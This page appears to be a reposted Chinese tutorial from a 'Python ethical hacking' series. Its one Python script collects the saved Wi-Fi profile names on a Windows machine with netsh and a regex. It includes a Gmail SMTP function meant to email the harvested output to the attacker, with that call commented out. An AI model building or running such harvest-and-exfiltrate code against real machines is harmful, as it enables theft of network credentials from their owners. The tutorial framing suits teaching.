码迷,mamicode.com
首页 > 编程语言 > 详细

Python Ethical Hacking - Malware Analysis(2)

时间:2019-09-28 23:24:30      阅读:99      评论:0      收藏:0      [点我收藏+]

标签:style   email   and   pass   start   show   smt   eth   aaa   

Filtering Command Output using Regex

#!/usr/bin/env python

import smtplib
import subprocess
import re


def send_mail(email, password, message):
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()


command = "netsh wlan show profile"
networks = subprocess.check_output(command, shell=True)
network_names = re.findall(b"(?:Profile\s*:\s)(.*)", networks)
print(network_names)
# send_mail("aaaa@gmail.com", "1111111", result)

技术图片

 

Python Ethical Hacking - Malware Analysis(2)

标签:style   email   and   pass   start   show   smt   eth   aaa   

原文地址:https://www.cnblogs.com/keepmoving1113/p/11605273.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!